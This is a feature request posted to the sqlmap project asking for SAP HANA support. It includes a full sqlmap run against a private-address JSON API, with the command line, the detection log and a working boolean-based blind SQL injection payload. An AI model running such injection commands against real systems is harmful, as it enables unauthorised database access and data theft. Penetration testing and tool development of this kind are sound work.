Feature request: Add support for SAP HANA database #5956
Description
Hey sqlmap team,
First off, thanks for creating and maintaining such an amazing tool. It's an essential part of my toolkit.
I'm writing to suggest adding support for the SAP HANA database. It's popping up more and more in enterprise environments I test, and I've noticed that sqlmap currently struggles to identify it. This usually means having to switch to time-consuming manual testing, which is a shame when we're so close to automating it.
It would be incredible to have full support, including the ability to properly fingerprint HANA, use the standard injection techniques (boolean, time-based, UNION, etc.), and of course, enumerate and dump data.
I actually ran into this exact problem recently. The log below shows a perfect example: sqlmap correctly finds a boolean-based blind injection point, but then stalls because it can't identify the backend DBMS, which was SAP HANA. It got so close!
sqlmap -u "https://10.10.10.13:9001/api/UserDetails" --data '{"UserId": "ABC001"}' --random-agent --dbms="SAP MaxDB" --flush-session
___
H
___ ["]__ ___ ___ {1.9.8#stable}
|_ -| . ['] | .'| . |
|| [,]|||__,| |
||V... || https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 00:02:18 /2025-09-06/
[00:02:19] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.5+ (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
JSON data found in POST body. Do you want to process it? [Y/n/q]
[00:02:20] [INFO] flushing session file
[00:02:20] [INFO] testing connection to the target URL
[00:02:21] [INFO] checking if the target is protected by some kind of WAF/IPS
[00:02:22] [INFO] testing if the target URL content is stable
[00:02:22] [INFO] target URL content is stable
[00:02:22] [INFO] testing if (custom) POST parameter 'JSON UserId' is dynamic
[00:02:23] [WARNING] (custom) POST parameter 'JSON UserId' does not appear to be dynamic
[00:02:23] [INFO] heuristic (basic) test shows that (custom) POST parameter 'JSON UserId' might be injectable
[00:02:24] [INFO] testing for SQL injection on (custom) POST parameter 'JSON UserId'
[00:02:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:02:29] [INFO] (custom) POST parameter 'JSON UserId' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --code=200)
[00:02:29] [INFO] testing 'Generic inline queries'
[00:02:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:02:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[00:02:30] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[00:02:32] [INFO] target URL appears to have 5 columns in query
[00:02:32] [WARNING] applying generic concatenation (CONCAT)
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] N
[00:02:49] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. '--union-char=1')
[00:02:59] [INFO] checking if the injection point on (custom) POST parameter 'JSON UserId' is a false positive
(custom) POST parameter 'JSON UserId' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 63 HTTP(s) requests:
Parameter: JSON UserId ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: {"UserId": "ABC001' AND 1285=1285 AND 'RHcm'='RHcm"}
[00:03:05] [INFO] testing SAP MaxDB
[00:03:05] [WARNING] the back-end DBMS is not SAP MaxDB
[00:03:05] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system
[00:03:05] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 59 times
[*] ending @ 00:03:05 /2025-09-06/
Adding native support for HANA would be a huge help for pentesters working in corporate environments.
Thanks for your time and for considering this. Keep up the fantastic work!